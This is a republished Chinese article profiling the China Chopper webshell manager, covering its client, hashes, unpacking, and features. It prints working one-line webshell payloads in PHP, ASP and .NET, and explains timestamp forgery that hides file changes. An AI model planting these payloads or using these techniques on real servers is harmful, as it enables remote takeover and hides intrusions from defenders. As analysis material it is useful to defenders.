加入收藏 | 设为首页 | 会员中心 | 我要投稿 PHP编程网 - 黄冈站长网 (http://www.0713zz.com/)- 数据应用、建站、人体识别、智能机器人、语音技术!
当前位置: 首页 > 运营中心 > 建站资源 > 策划 > 正文

十大黑客工具之中国菜刀(Chopper)

发布时间:2019-06-04 14:12:19 所属栏目:策划 来源:残花花败柳柳
导读:副标题#e# Chopper是中国黑客圈内使用非常广泛的一款Webshell管理工具。中国菜刀用途十分广泛,支持多种语言,小巧实用。 Web Shell客户端 中国菜刀的客户端可在www.maicaidao.com下载到。 Webshell(CnC)ClientMD5 caidao.exe5001ef50c7e869253a7c152a638ea
副标题[/!--empirenews.page--]

Chopper是中国黑客圈内使用非常广泛的一款Webshell管理工具。中国菜刀用途十分广泛,支持多种语言,小巧实用。

中国菜刀(Chopper)

Web Shell客户端

中国菜刀的客户端可在www.maicaidao.com下载到。

  1. Web shell (CnC) Client MD5 
  2. caidao.exe 5001ef50c7e869253a7c152a638eab8a 

注:这里可以对你的下载菜单的MD5值是否相同,如果不同则有可能加了后门或者捆绑了木马。

客户端使用UPX加壳,有220672个字节大小,如图1所示:

十大黑客工具之中国菜刀(Chopper)

使用脱壳工具脱壳,可以看到一些隐藏的细节:

  1. C:Documents and SettingsAdministratorDesktop>upx -d 5001ef50c7e869253a7c152a638eab8a.exe -o decomp.exeUltimate Packer for eXecutablesCopyright (C) 1996 - 2011 
  2. UPX 3.08w Markus Oberhumer, Laszlo Molnar & John Reiser Dec 12th 2011 
  3. File size Ratio Format Name 
  4. -------------------- ------ ----------- ----------- 
  5. 700416 <- 220672 31.51% win32/pe decomp.exe 
  6. Unpacked 1 file. 

使用PEID(一个免费检测软件使用的加壳手法的工具),我们可以看到解压缩后的客户端程序使用Visual C + + 6.0编写,如图2所示:

十大黑客工具之中国菜刀(Chopper)

因为字符串没有进行编码,所以可以通过打印输出该后门如何通信,我们可以看到一个url google.com.hk(图3),以及参考文本Chopper(图4)。

十大黑客工具之中国菜刀(Chopper)

十大黑客工具之中国菜刀(Chopper)

打开中国菜刀界面,我们可以看到该工具是一款图形界面工具,并且提供了添加自己的目标、管理的功能,在客户端软件上,右键单击选择“添加”,输入IP地址,以及密码和编码方式,如图5所示:

十大黑客工具之中国菜刀(Chopper)

服务端payload组件

中国菜刀的工具是一款Webshell管理工具,相应必然有一个服务端的程序,它支持各种语言,如ASP、ASPX、PHP、JSP、CFM,一些官网下载原始程序MD5 HASH如下:

  1. Web shell Payload MD5 Hash 
  2. Customize.aspx 8aa603ee2454da64f4c70f24cc0b5e08 
  3. Customize.cfm ad8288227240477a95fb023551773c84 
  4. Customize.jsp acba8115d027529763ea5c7ed6621499 

例子如下:

  1. PHP: <?php @eval($_POST['pass']);?> 
  2. ASP: <%eval request("pass")%> 
  3. .NET: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%> 

在实际使用过程中,替换PASS为链接的时候需要的密码。

功能

上面简单介绍了中国菜刀的客户端和服务端的,下面来介绍下该款工具的其他功能,中国菜刀包含了“安全扫描”功能,攻击者能够使用爬虫或暴力破解来攻击目标站点,如下图:

十大黑客工具之中国菜刀(Chopper)

在除了发现漏洞之外,中国菜刀最强大的莫过于管理功能了,包含以下内容:

  • 文件管理(文件资源管理器)
  • 数据库管理(DB客户端)
  • 虚拟终端(命令行)

在中国菜刀的客户端界面中,右键单击一个目标可以查看相应的功能列表,如图7:

十大黑客工具之中国菜刀(Chopper)

文件管理

中国菜刀作为一个远程访问工具(RAT),包含了常见的上传、下载、编辑、删除、复制、重命名以及改变文件的时间戳。如图8:

十大黑客工具之中国菜刀(Chopper)

修改文件功能现在常见的webshell就带了该功能,图9显示了测试目录的三个文件,因为Windows资源管理器只显示“修改日期”字段,所以通常情况下,能够达到隐藏操作的目的。

使用工具将文件修改和其他两个文件相同,如图10,可以看到文件的修改的日期和其他两个文件一致,如果不是专业的人士,一般不会看出这几个文件的区别:

十大黑客工具之中国菜刀(Chopper)

(编辑:PHP编程网 - 黄冈站长网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

热点阅读